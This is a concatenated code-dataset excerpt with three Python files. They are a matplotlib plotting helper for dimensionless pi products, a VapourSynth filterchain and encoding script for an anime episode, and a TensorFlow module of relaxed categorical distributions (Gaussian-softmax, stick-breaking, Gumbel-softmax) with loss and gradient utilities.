OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n'''\nFile: pi_to_pi.py\nAuthor: Pierre-Yves Taunay\nDate: July 2020\n\nPlot the pi products for the total pressure against one-another\n'''\n\nimport matplotlib.pyplot as plt\n\ndef plot_pi_to_pi(data):\n fig, ax = plt.subplots(7,7)\n \n # For each pi product...\n for idxi in range(7):\n PIi_str = 'PI' + str(idxi+1)\n \n for idxj in range(7):\n if idxj >= idxi:\n PIj_str = 'PI' + str(idxj+1)\n \n ax[idxi][idxj].plot(data[[PIj_str]],data[[PIi_str]],'ko')\n\n ax[0,0].set_ylabel(\"Pi1\")\n ax[1,0].set_ylabel(\"Pi2\")\n ax[2,0].set_ylabel(\"Pi3\")\n ax[3,0].set_ylabel(\"Pi4\")\n ax[4,0].set_ylabel(\"Pi5\")\n ax[5,0].set_ylabel(\"Pi6\")\n ax[6,0].set_ylabel(\"Pi7\")\n\n ax[6,0].set_xlabel(\"Pi1\")\n ax[6,1].set_xlabel(\"Pi2\")\n ax[6,2].set_xlabel(\"Pi3\")\n ax[6,3].set_xlabel(\"Pi4\")\n ax[6,4].set_xlabel(\"Pi5\")\n ax[6,5].set_xlabel(\"Pi6\")\n ax[6,6].set_xlabel(\"Pi7\")\n\n\n\n","sub_path":"applications/empirical_analysis_core/pi_to_pi.py","file_name":"pi_to_pi.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"608640676","text":"import os\nfrom pathlib import Path\nfrom typing import Tuple, Union\n\nimport vapoursynth as vs\nfrom lvsfunc.misc import source\nfrom vardautomation import FileInfo, PresetAAC, PresetWEB, VPath\n\nfrom project_module import encoder as enc\nfrom project_module import flt # noqa\n\ncore = vs.core\n\nmake_wraw: bool = False # Create a workraw\nenc_type = 'Premux' if not make_wraw else 'wraw'\n\nEP_NUM = __file__[-5:-3]\n\n\nshader_file = 'assets/FSRCNNX_x2_56-16-4-1.glsl'\nif not Path(shader_file).exists():\n hookpath = 
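# Usage sketch for the plot_pi_to_pi record above (ours, not part of the record; the
# import path is hypothetical). The function expects a pandas DataFrame with columns
# PI1..PI7 and draws the upper-triangular scatter matrix:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from pi_to_pi import plot_pi_to_pi  # hypothetical import of the module above

data = pd.DataFrame(np.random.lognormal(size=(100, 7)),
                    columns=[f'PI{i}' for i in range(1, 8)])
plot_pi_to_pi(data)
plt.show()  # the function only builds the axes; it never calls show() itself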
r\"mpv/shaders/FSRCNNX_x2_56-16-4-1.glsl\"\n shader_file = os.path.join(str(os.getenv(\"APPDATA\")), hookpath)\n\n\n# Sources\nJP_clip = FileInfo(f'sources/{EP_NUM}/[NC-Raws] 迦希女王不会放弃! - {EP_NUM} [B-Global][WEB-DL][1080p][AVC AAC][Multiple Subtitle][MKV].mkv', # noqa\n idx=lambda x: source(x, force_lsmas=True, cachedir=''),\n preset=[PresetWEB, PresetAAC])\nJP_clip.name_file_final = VPath(f\"{enc_type.lower()}/Jahy_{EP_NUM} ({enc_type}).mkv\")\nJP_clip.name_clip_output = VPath(JP_clip.name + '.265')\nJP_clip.do_qpfile = True\n\n\ndef filterchain() -> Union[vs.VideoNode, Tuple[vs.VideoNode, ...]]:\n \"\"\"Regular VapourSynth filterchain\"\"\"\n import havsfunc as haf\n import lvsfunc as lvf\n import vardefunc as vdf\n from adptvgrnMod import adptvgrnMod\n from ccd import ccd\n from muvsfunc import SSIM_downsample\n from vsutil import depth, get_y, iterate\n from xvs import WarpFixChromaBlend\n\n src = JP_clip.clip_cut.std.AssumeFPS(fpsnum=24000, fpsden=1001)\n src = depth(src, 16)\n\n # TO-DO: Figure out how they post-sharpened it. Probably some form of unsharpening?\n src_y = depth(get_y(src), 32)\n descale = lvf.kernels.Bicubic(b=0, c=3/4).descale(src_y, 1440, 810)\n double = vdf.scale.nnedi3cl_double(descale, pscrn=1)\n rescale = depth(SSIM_downsample(double, 1920, 1080), 16)\n scaled = vdf.misc.merge_chroma(rescale, src)\n\n denoise_ref = core.dfttest.DFTTest(scaled, sigma=1.8)\n denoise = lvf.denoise.bm3d(scaled, sigma=[0.75, 0.65], ref=denoise_ref)\n cdenoise = ccd(denoise, threshold=3, matrix='709')\n decs = vdf.noise.decsiz(cdenoise, sigmaS=4, min_in=208 << 8, max_in=232 << 8)\n\n # Dehalo fuckery. Fuck the sharpening, dude\n dehalo = haf.YAHR(decs, blur=2, depth=32)\n dehalo_2 = lvf.dehalo.masked_dha(dehalo, ry=2.5, rx=2.5)\n halo_mask = lvf.mask.halo_mask(decs, rad=3, brz=0.3, thma=0.42)\n dehalo_masked = core.std.MaskedMerge(decs, dehalo_2, halo_mask)\n dehalo_min = core.std.Expr([dehalo_masked, decs], \"x y min\")\n\n # Brightening the lines to undo the unsharpening's line darkening\n bright = haf.FastLineDarkenMOD(dehalo_min, strength=-24)\n\n # AA\n baa = lvf.aa.based_aa(bright, str(shader_file))\n sraa = lvf.sraa(bright, rfactor=1.45)\n clmp = lvf.aa.clamp_aa(bright, baa, sraa, strength=1.45)\n\n line_mask = core.std.Prewitt(clmp)\n cwarp = WarpFixChromaBlend(clmp, thresh=96, depth=6)\n cwarp = core.std.MaskedMerge(cwarp, clmp, line_mask)\n\n upscale = lvf.kernels.Bicubic(b=0, c=3/4).scale(descale, 1920, 1080)\n credit_mask = lvf.scale.descale_detail_mask(src_y, upscale, threshold=0.08)\n credit_mask = iterate(credit_mask, core.std.Deflate, 3)\n credit_mask = iterate(credit_mask, core.std.Inflate, 3)\n credit_mask = iterate(credit_mask, core.std.Maximum, 2)\n merge_credits = core.std.MaskedMerge(cwarp, src, depth(credit_mask, 16))\n\n deband = flt.masked_f3kdb(merge_credits, rad=15, thr=20, grain=[12, 0])\n grain: vs.VideoNode = adptvgrnMod(deband, seed=42069, strength=0.15, luma_scaling=10,\n size=1.25, sharp=70, static=True, grain_chroma=False)\n\n return grain\n\n\ndef wraw_filterchain() -> vs.VideoNode:\n \"\"\"Workraw filterchain with minimal filtering\"\"\"\n from debandshit.debanders import dumb3kdb\n from vsutil import depth\n\n src: vs.VideoNode = JP_clip.cut\n src = depth(src, 16)\n\n deband = dumb3kdb(src, radius=16, threshold=30, grain=16)\n grain: vs.VideoNode = core.grain.Add(deband, 0.15)\n\n return grain\n\n\nif __name__ == '__main__':\n FILTERED = filterchain() if not make_wraw else wraw_filterchain()\n enc.Encoder(JP_clip, FILTERED).run(wraw=make_wraw, 
make_comp=False, clean_up=True, ep_num=EP_NUM) # type: ignore\nelif __name__ == '__vapoursynth__':\n FILTERED = filterchain()\n if not isinstance(FILTERED, vs.VideoNode):\n for i, CLIP_FILTERED in enumerate(FILTERED, start=1):\n CLIP_FILTERED.set_output(i)\n else:\n FILTERED.set_output(1)\nelse:\n JP_clip.clip_cut.set_output(0)\n # FILTERED = pre_freeze()\n FILTERED = filterchain() if not make_wraw else wraw_filterchain()\n if not isinstance(FILTERED, vs.VideoNode):\n for i, clip_filtered in enumerate(FILTERED, start=1):\n if clip_filtered:\n clip_filtered.set_output(i)\n else:\n FILTERED.set_output(1)\n","sub_path":"[GJM]/Completed/Jahy-sama wa Kujikenai/jahy_11.py","file_name":"jahy_11.py","file_ext":"py","file_size_in_byte":4893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"190946191","text":"# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n# ===========================================================================================================\nimport numpy as np\nimport tensorflow as tf\nfrom functools import partial\nfrom typing import Tuple, List\nfrom os import environ as os_env\nos_env['TF_CPP_MIN_LOG_LEVEL'] = '2'\n# ===========================================================================================================\n# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n# ===========================================================================================================\n\n\nclass Distributions:\n\n def __init__(self, batch_size: int, categories_n: int, sample_size: int = 1, num_of_vars: int = 1,\n noise_type: str = 'normal',\n temp: tf.Tensor = tf.constant(0.1, dtype=tf.float32), threshold: float = 0.99):\n\n self.noise_type = noise_type\n self.threshold = threshold\n self.temp = temp\n self.batch_size = batch_size\n self.categories_n = categories_n\n self.sample_size = sample_size\n self.num_of_vars = num_of_vars\n\n self.epsilon = tf.constant(0., dtype=tf.float32)\n self.sigma = tf.constant(0., dtype=tf.float32)\n self.delta = tf.constant(0., dtype=tf.float32)\n self.kappa = tf.constant(0., dtype=tf.float32)\n self.n_required = categories_n\n self.psi = tf.constant(0., dtype=tf.float32)\n\n self.truncation_option = 'quantile'\n self.quantile = 70\n self.log_q_psi = tf.constant(0., dtype=tf.float32)\n\n def broadcast_params_to_sample_size(self, params: list):\n params_broad = []\n for param in params:\n shape = (self.batch_size, self.categories_n, self.sample_size, self.num_of_vars)\n param_w_samples = tf.broadcast_to(input=param, shape=shape)\n params_broad.append(param_w_samples)\n return params_broad\n\n def sample_noise(self, shape) -> tf.Tensor:\n if self.noise_type == 'normal':\n epsilon = tf.random.normal(shape=shape)\n elif self.noise_type == 'trunc_normal':\n epsilon = tf.random.truncated_normal(shape=shape)\n elif self.noise_type == 'gamma':\n epsilon = tf.random.gamma(shape=shape, alpha=1., beta=1.)\n elif self.noise_type == 'cauchy':\n epsilon = tf.constant(np.random.standard_cauchy(size=shape), dtype=tf.float32)\n else:\n raise RuntimeError\n return epsilon\n\n def perform_truncation_via_threshold(self, vector):\n vector_cumsum = tf.math.cumsum(x=vector, axis=1)\n larger_than_threshold = tf.where(condition=vector_cumsum <= self.threshold)\n if self.truncation_option == 'quantile':\n self.n_required = int((np.percentile(larger_than_threshold[:, 1] + 1, q=self.quantile)))\n 
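# Aside (our NumPy sketch, not part of the record): what perform_truncation_via_threshold
# above computes for the 'quantile' option -- keep enough categories that the cumulative
# probability mass stays within the threshold:
import numpy as np

probs = np.array([[0.6, 0.3, 0.05, 0.03, 0.02]])          # one batch row, 5 categories
cumsum = np.cumsum(probs, axis=1)                          # [0.6, 0.9, 0.95, 0.98, 1.0]
within = np.argwhere(cumsum <= 0.99)                       # (row, category) index pairs
n_required = int(np.percentile(within[:, 1] + 1, q=70))    # the quantile=70 branch above
print(n_required)                                          # 3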
elif self.truncation_option == 'max':\n self.n_required = (tf.math.reduce_max(larger_than_threshold[:, 1]) + 1).numpy()\n else:\n self.n_required = (tf.math.reduce_mean(larger_than_threshold[:, 1]) + 1).numpy()\n\n def subset_variables_to_n_required(self, epsilon, sigma, delta, kappa):\n self.epsilon = epsilon[:, :self.n_required, :]\n self.sigma = sigma[:, :self.n_required, :]\n self.delta = delta[:, :self.n_required, :]\n self.kappa = kappa[:, :self.n_required, :]\n\n\nclass GaussianSoftmaxDist(Distributions):\n def __init__(self, mu: tf.Tensor, xi: tf.Tensor, noise_type: str = 'normal', sample_size: int = 1,\n temp: tf.Tensor = tf.constant(0.1, dtype=tf.float32)):\n super().__init__(batch_size=mu.shape[0], categories_n=mu.shape[1], sample_size=sample_size,\n noise_type=noise_type, temp=temp, num_of_vars=mu.shape[3])\n\n self.mu = mu\n self.xi = xi\n self.lam = tf.constant(0., dtype=tf.float32)\n self.psi = tf.constant(0., dtype=tf.float32)\n self.log_psi = tf.constant(0., dtype=tf.float32)\n\n def do_reparameterization_trick(self):\n mu_broad, xi_broad = self.broadcast_params_to_sample_size(params=[self.mu, self.xi])\n epsilon = self.sample_noise(shape=mu_broad.shape)\n sigma = convert_ξ_to_σ(ξ=xi_broad,)\n self.lam = (mu_broad + sigma * epsilon) / self.temp\n self.log_psi = self.lam - tf.math.reduce_logsumexp(self.lam, axis=1, keepdims=True)\n self.psi = self.project_to_vertices()\n\n def project_to_vertices(self):\n psi = project_to_vertices_via_softmax_pp(self.lam)\n # psi = tf.math.softmax(self.lam, axis=1)\n return psi\n\n\nclass IsoGauSoftMax(Distributions):\n def __init__(self, mu: tf.Tensor, noise_type: str = 'normal', temp: tf.Tensor = tf.constant(0.1),\n sample_size: int = 1):\n super().__init__(batch_size=mu.shape[0], categories_n=mu.shape[1], noise_type=noise_type, temp=temp,\n sample_size=sample_size, num_of_vars=mu.shape[3])\n\n self.mu = mu\n self.lam = tf.constant(0., dtype=tf.float32)\n self.psi = tf.constant(0., dtype=tf.float32)\n\n def do_reparameterization_trick(self):\n mu_broad = self.broadcast_params_to_sample_size(params=[self.mu])[0]\n epsilon = self.sample_noise(shape=mu_broad.shape)\n self.lam = (mu_broad + epsilon) / self.temp\n self.psi = self.project_to_vertices()\n\n def project_to_vertices(self):\n psi = tf.math.softmax(self.lam, axis=1)\n return psi\n\n\nclass GaussianSoftPlus(GaussianSoftmaxDist):\n def __init__(self, mu: tf.Tensor, xi: tf.Tensor, temp: tf.Tensor, sample_size: int = 1,\n noise_type: str = 'normal'):\n super().__init__(mu=mu, xi=xi, noise_type=noise_type, temp=temp, sample_size=sample_size)\n\n def project_to_vertices(self):\n psi = project_to_vertices_via_softplus(lam=self.lam)\n return psi\n\n\nclass CauchySoftmaxDist(GaussianSoftmaxDist):\n def __init__(self, mu: tf.Tensor, xi: tf.Tensor, noise_type: str = 'cauchy', sample_size: int = 1,\n temp: tf.Tensor = tf.constant(0.1, dtype=tf.float32)):\n super().__init__(mu=mu, xi=xi, noise_type=noise_type, temp=temp, sample_size=sample_size)\n self.noise_type = 'cauchy'\n\n\nclass LogitDist(Distributions):\n\n def __init__(self, mu: tf.Tensor, xi: tf.Tensor, sample_size: int = 1, noise_type: str = 'normal',\n temp: tf.Tensor = tf.constant(0.1, dtype=tf.float32), threshold: float = 0.99):\n super().__init__(batch_size=mu.shape[0], categories_n=mu.shape[1], sample_size=sample_size,\n noise_type=noise_type, temp=temp, threshold=threshold)\n\n self.mu = mu\n self.xi = xi\n self.eta = tf.constant(0., dtype=tf.float32)\n self.lam = tf.constant(0., dtype=tf.float32)\n self.projection_option = 
'softmax'\n self.random_jump_threshold = 0.25\n\n def compute_log_logit_dist(self) -> tf.Tensor:\n if self.projection_option == 'softmax':\n log_q_psi = compute_log_logit_dist(epsilon=self.epsilon, sigma=self.sigma, kappa=self.kappa,\n temp=self.temp, lam=self.lam)\n else:\n log_q_psi = compute_log_logit_dist_projection(epsilon=self.epsilon, sigma=self.sigma,\n kappa=self.kappa, temp=self.temp)\n return log_q_psi\n\n def do_reparameterization_trick(self):\n # mu_broad, xi_broad = self.broadcast_params_to_sample_size(params=[self.mu, self.xi])\n # mu_broad = self.mu\n # xi_broad = self.xi\n mu_broad = self.mu[:, :, :, 0]\n xi_broad = self.xi[:, :, :, 0]\n mu_broad = tf.broadcast_to(mu_broad, shape=(self.batch_size, self.categories_n, self.sample_size))\n xi_broad = tf.broadcast_to(xi_broad, shape=(self.batch_size, self.categories_n, self.sample_size))\n epsilon = self.sample_noise(shape=mu_broad.shape)\n sigma, delta, kappa = retrieve_transformations_up_to_kappa(mu_broad=mu_broad, xi_broad=xi_broad,\n epsilon=epsilon)\n self.get_eta_and_n_required(kappa=kappa)\n self.subset_variables_to_n_required(epsilon, sigma, delta, kappa)\n if self.projection_option == 'softmax':\n # self.lam, self.psi = project_to_vertices_via_softmax(eta=self.eta, temp=self.temp)\n # self.psi = project_to_vertices_via_softmax(λ=self.lam)\n self.lam = self.eta / self.temp\n self.psi = tf.math.softmax(self.lam, axis=1)\n self.psi = tf.reshape(self.psi, shape=self.psi.numpy().shape + (1,))\n else:\n uniform_sample = tf.random.uniform(shape=(self.batch_size, self.sample_size),\n minval=0, maxval=1)\n self.lam, self.psi = project_to_vertices_via_random_jump(\n eta=self.eta, temp=self.temp, uniform_sample=uniform_sample,\n random_jump_threshold=self.random_jump_threshold)\n\n def get_eta_and_n_required(self, kappa):\n self.perform_truncation_via_threshold(vector=kappa)\n self.eta = kappa[:, :self.n_required, :]\n\n\nclass SBDist(LogitDist):\n\n def __init__(self, mu: tf.Tensor, xi: tf.Tensor, sample_size: int = 1, noise_type: str = 'normal',\n temp: tf.Tensor = tf.constant(0.1, dtype=tf.float32), threshold: float = 0.99):\n super().__init__(mu=mu, xi=xi, sample_size=sample_size,\n noise_type=noise_type, temp=temp, threshold=threshold)\n\n self.run_iteratively = False\n self.log_jac = tf.constant(0., dtype=tf.float32)\n self.lower = np.zeros(shape=(self.categories_n - 1, self.categories_n - 1))\n self.upper = np.zeros(shape=(self.categories_n - 1, self.categories_n - 1))\n\n def compute_log_sb_dist(self) -> tf.Tensor:\n log_q_psi = compute_log_sb_dist(lam=self.lam, kappa=self.kappa, sigma=self.sigma,\n epsilon=self.epsilon, log_jac=self.log_jac, temp=self.temp)\n return log_q_psi\n\n def get_eta_and_n_required(self, kappa):\n if self.run_iteratively:\n self.eta, self.log_jac = self.compute_sb_and_log_jac_iteratively(κ=kappa)\n else:\n self.lower, self.upper = generate_lower_and_upper_triangular_matrices_for_sb(\n categories_n=self.categories_n, lower=self.lower, upper=self.upper,\n batch_size=self.batch_size, sample_size=self.sample_size)\n self.eta, self.log_jac = self.perform_stick_break_and_compute_log_jac(kappa=kappa)\n\n def perform_stick_break_and_compute_log_jac(self, kappa: tf.Tensor) -> Tuple[tf.Tensor, tf.Tensor]:\n accumulated_prods = accumulate_one_minus_kappa_products_for_sb(kappa=kappa, lower=self.lower,\n upper=self.upper)\n ς = 1.e-20\n eta = kappa * accumulated_prods\n self.perform_truncation_via_threshold(vector=eta)\n log_jac = -tf.reduce_sum(tf.math.log(accumulated_prods[:, :self.n_required, :] + ς), 
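# Aside (our NumPy sketch, not part of the record): the stick-break step above maps
# independent kappa_i in (0, 1) to weights eta_i = kappa_i * prod_{j<i}(1 - kappa_j),
# which are non-negative and sum to at most 1 -- the basis for the truncation logic:
import numpy as np

kappa = np.array([0.5, 0.5, 0.5, 0.5])
remaining = np.concatenate(([1.0], np.cumprod(1.0 - kappa)[:-1]))  # stick left before step i
eta = kappa * remaining
print(eta)        # [0.5    0.25   0.125  0.0625]
print(eta.sum())  # 0.9375 <= 1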
axis=1)\n return eta[:, :self.n_required, :], log_jac\n\n def compute_sb_and_log_jac_iteratively(self, κ):\n η, log_jac = iterative_sb_and_jac(κ=κ)\n self.perform_truncation_via_threshold(η)\n return η[:, :self.n_required, :], log_jac\n\n\nclass ExpGSDist(Distributions):\n\n def __init__(self, log_pi: tf.Tensor, sample_size: int = 1, noise_type: str = 'normal',\n temp: tf.Tensor = tf.constant(0.1, dtype=tf.float32)):\n super().__init__(batch_size=log_pi.shape[0], categories_n=log_pi.shape[1], sample_size=sample_size,\n noise_type=noise_type, temp=temp, num_of_vars=log_pi.shape[3])\n self.log_pi = log_pi\n self.log_psi = tf.constant(value=0., dtype=tf.float32)\n\n def do_reparameterization_trick(self):\n ς = 1.e-20\n log_pi_broad = self.broadcast_params_to_sample_size(params=[self.log_pi])[0]\n uniform = tf.random.uniform(shape=log_pi_broad.shape)\n gumbel_sample = -tf.math.log(-tf.math.log(uniform + ς) + ς)\n y = (log_pi_broad + gumbel_sample) / self.temp\n self.log_psi = y - tf.math.reduce_logsumexp(y, axis=1, keepdims=True)\n self.psi = tf.math.softmax(logits=y, axis=1)\n\n\n# ===========================================================================================================\n# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n# ===========================================================================================================\n# Distribution functions\n# ===========================================================================================================\ndef compute_log_sb_dist(lam, kappa, sigma, epsilon, log_jac, temp: tf.Tensor):\n log_q_lam = compute_log_logit_dist(lam=lam, kappa=kappa, sigma=sigma, epsilon=epsilon, temp=temp)\n log_q_psi = log_q_lam + log_jac\n return log_q_psi\n\n\ndef compute_log_logit_dist(lam, kappa, sigma, epsilon, temp: tf.Tensor):\n n_required = epsilon.shape[1]\n log_q_kappa = compute_log_logit_normal(epsilon=epsilon, sigma=sigma, kappa=kappa)\n log_q_psi = log_q_kappa + (n_required * tf.math.log(temp) + temp * tf.math.reduce_sum(lam, axis=1))\n return log_q_psi\n\n\ndef compute_log_logit_dist_projection(kappa, sigma, epsilon, temp: tf.Tensor):\n n_required = epsilon.shape[1]\n log_q_kappa = compute_log_logit_normal(epsilon=epsilon, sigma=sigma, kappa=kappa)\n log_q_psi = log_q_kappa - n_required * tf.math.log(temp)\n return log_q_psi\n\n\ndef compute_log_logit_normal(epsilon, sigma, kappa) -> tf.Tensor:\n log_norm_cons = compute_log_logit_normal_normalizing_constant(sigma, kappa)\n log_exp_sum = -(tf.constant(value=0.5, dtype=tf.float32) * tf.reduce_sum(epsilon ** 2, axis=1))\n\n log_q_kappa = log_norm_cons + log_exp_sum\n return log_q_kappa\n\n\ndef compute_log_logit_normal_normalizing_constant(sigma, kappa) -> tf.Tensor:\n math_pi = 3.141592653589793\n ς = 1.e-20\n n_required = kappa.shape[1]\n\n constant_term = -n_required / 2 * tf.math.log(2. 
* math_pi)\n sigma_term = -tf.reduce_sum(tf.math.log(sigma + ς), axis=1)\n kappa_term = -(tf.reduce_sum(tf.math.log(kappa + ς), axis=1) +\n tf.reduce_sum(tf.math.log(1 - kappa + ς), axis=1))\n\n log_norm_const = constant_term + sigma_term + kappa_term\n return log_norm_const\n\n\ndef compute_log_gs_dist(psi: tf.Tensor, logits: tf.Tensor, temp: tf.Tensor) -> tf.Tensor:\n n_required = tf.constant(value=psi.shape[1], dtype=tf.float32)\n ς = tf.constant(1.e-20)\n\n log_const = tf.math.lgamma(n_required) + (n_required - 1) * tf.math.log(temp)\n log_sum = tf.reduce_sum(logits - (temp + tf.constant(1.)) * tf.math.log(psi + ς), axis=1)\n log_norm = - n_required * tf.math.log(tf.reduce_sum(tf.math.exp(logits) / psi ** temp, axis=1) + ς)\n\n log_p_concrete = log_const + log_sum + log_norm\n return log_p_concrete\n\n\ndef compute_log_exp_gs_dist(log_psi: tf.Tensor, logits: tf.Tensor, temp: tf.Tensor) -> tf.Tensor:\n categories_n = tf.constant(log_psi.shape[1], dtype=tf.float32)\n log_cons = tf.math.lgamma(categories_n) + (categories_n - 1) * tf.math.log(temp)\n aux = logits - temp * log_psi\n log_sums = tf.math.reduce_sum(aux, axis=1) - categories_n * tf.math.reduce_logsumexp(aux, axis=1)\n log_exp_gs_dist = log_cons + log_sums\n return log_exp_gs_dist\n\n\n# ===========================================================================================================\n# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n# ===========================================================================================================\n# Optimization functions for the Expectation Minimization Loss\n# ===========================================================================================================\ndef compute_loss(params: List[tf.Tensor], temp: tf.Tensor, probs: tf.Tensor, dist_type: str = 'sb',\n sample_size: int = 1, threshold: float = 0.99, run_iteratively=False, run_kl=True):\n chosen_dist = select_chosen_distribution(dist_type=dist_type, params=params, temp=temp,\n sample_size=sample_size, threshold=threshold,\n run_iteratively=run_iteratively)\n\n chosen_dist.do_reparameterization_trick()\n psi_mean = tf.reduce_mean(chosen_dist.psi, axis=[0, 2, 3])\n if run_kl:\n loss = psi_mean * (tf.math.log(psi_mean) - tf.math.log(probs[:chosen_dist.n_required] + 1.e-20))\n loss = tf.reduce_sum(loss)\n else:\n loss = tf.reduce_sum((psi_mean - probs[:chosen_dist.n_required]) ** 2)\n return loss, chosen_dist.n_required\n\n\ndef compute_gradients(params, temp: tf.Tensor, probs: tf.Tensor, run_kl=True,\n dist_type: str = 'sb', sample_size: int = 1, run_iteratively=False,\n threshold: float = 0.99) -> Tuple[tf.Tensor, tf.Tensor, int]:\n with tf.GradientTape() as tape:\n loss, n_required = compute_loss(params=params, temp=temp, probs=probs, sample_size=sample_size,\n threshold=threshold, dist_type=dist_type, run_kl=run_kl,\n run_iteratively=run_iteratively)\n gradient = tape.gradient(target=loss, sources=params)\n return gradient, loss, n_required\n\n\ndef apply_gradients(optimizer: tf.keras.optimizers, gradients: tf.Tensor, variables):\n optimizer.apply_gradients(zip(gradients, variables))\n\n\n# ===========================================================================================================\n# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n# ===========================================================================================================\n# Utils\n# 
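# Aside (our sketch, not part of the record): ExpGSDist above adds -log(-log(U)) Gumbel
# noise to the logits; by the Gumbel-max trick, argmax(log_pi + noise) is an exact sample
# from Categorical(pi), and the tempered softmax is its differentiable relaxation:
import numpy as np

rng = np.random.default_rng(0)
log_pi = np.log(np.array([0.7, 0.2, 0.1]))
draws = [np.argmax(log_pi - np.log(-np.log(rng.uniform(size=3)))) for _ in range(50_000)]
print(np.bincount(draws) / len(draws))  # approximately [0.7, 0.2, 0.1]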
===========================================================================================================\ndef retrieve_transformations_up_to_kappa(mu_broad: tf.Tensor, xi_broad: tf.Tensor, epsilon: tf.Tensor):\n sigma = convert_ξ_to_σ(ξ=xi_broad)\n delta = mu_broad + sigma * epsilon\n kappa = tf.math.sigmoid(delta)\n return sigma, delta, kappa\n\n\ndef convert_ξ_to_σ(ξ: tf.Tensor):\n σ = tf.math.exp(ξ)\n return σ\n\n\n@tf.function\ndef project_to_vertices_via_softmax(λ):\n ς = 1.e-25\n λ_i_λ_j = λ - tf.math.reduce_max(λ, axis=1, keepdims=True)\n exp_λ = tf.math.exp(λ_i_λ_j)\n norm_λ = tf.math.reduce_sum(exp_λ, axis=1, keepdims=True)\n ψ_plus = exp_λ / (norm_λ + ς)\n return ψ_plus\n\n\n@tf.function\ndef project_to_vertices_via_softmax_pp(lam):\n offset = 1.e-1\n lam_i_lam_max = lam - tf.math.reduce_max(lam, axis=1, keepdims=True)\n exp_lam = tf.math.exp(lam_i_lam_max)\n norm_lam = tf.math.reduce_sum(exp_lam, axis=1, keepdims=True)\n aux = exp_lam / (norm_lam + offset)\n\n psi_plus = (1 - tf.math.reduce_sum(aux, axis=1, keepdims=True))\n psi = tf.concat(values=[aux, psi_plus], axis=1)\n\n return psi\n\n\ndef project_to_vertices_via_softplus(lam):\n ς = 1.e-20\n normalized_psi = tf.math.reduce_sum(tf.math.softplus(lam), axis=1, keepdims=True) + ς\n psi = tf.math.softplus(lam) / normalized_psi\n return psi\n\n\ndef project_to_vertices_via_random_jump(eta, temp: tf.Tensor, uniform_sample, random_jump_threshold):\n λ = eta\n batch_size, categories_n, sample_size = eta.shape\n ψ = tf.TensorArray(dtype=tf.float32, size=batch_size, element_shape=(categories_n, sample_size))\n # noinspection PyTypeChecker\n projection = temp * eta + (1. - temp) * project_into_simplex(eta)\n for i in tf.range(batch_size):\n if uniform_sample[i] <= random_jump_threshold:\n ψ = ψ.write(index=i, value=eta[i, :, :])\n else:\n ψ = ψ.write(index=i, value=projection[i, :, :])\n return λ, ψ.stack()\n\n\ndef project_into_simplex(vector: tf.Tensor):\n batch_size, n_required, sample_size = vector.shape\n projection = np.zeros(shape=(batch_size, n_required, sample_size))\n\n argmax_loc = np.argmax(vector.numpy(), axis=1)\n for sample in range(sample_size):\n for batch in range(batch_size):\n projection[batch, argmax_loc[batch, sample], sample] = 1.\n\n projection = tf.constant(value=projection, dtype=tf.float32)\n return projection\n\n\ndef accumulate_one_minus_kappa_products_for_sb(kappa: tf.Tensor, lower, upper) -> tf.Tensor:\n forget_last = -1\n one = tf.constant(value=1., dtype=tf.float32)\n\n diagonal_kappa = tf.linalg.diag(tf.transpose(one - kappa[:, :forget_last, :], perm=[0, 2, 1]))\n accumulation = tf.transpose(tf.tensordot(lower, diagonal_kappa, axes=[[1], [2]]),\n perm=[1, 0, 3, 2])\n accumulation_w_ones = accumulation + upper\n cumprod = tf.math.reduce_prod(input_tensor=accumulation_w_ones, axis=2)\n return cumprod\n\n\ndef generate_lower_and_upper_triangular_matrices_for_sb(categories_n, lower, upper,\n batch_size, sample_size):\n zeros_row = np.zeros(shape=categories_n - 1)\n\n for i in range(categories_n - 1):\n for j in range(categories_n - 1):\n if i > j:\n lower[i, j] = 1\n elif i == j:\n lower[i, j] = 1\n upper[i, j] = 1\n else:\n upper[i, j] = 1\n\n lower = np.vstack([zeros_row, lower])\n upper = np.vstack([upper, zeros_row])\n\n upper = np.broadcast_to(upper, shape=(batch_size, categories_n, categories_n - 1))\n upper = np.reshape(upper, newshape=(batch_size, categories_n, categories_n - 1, 1))\n upper = np.broadcast_to(upper, shape=(batch_size, categories_n, categories_n - 1, sample_size))\n lower = 
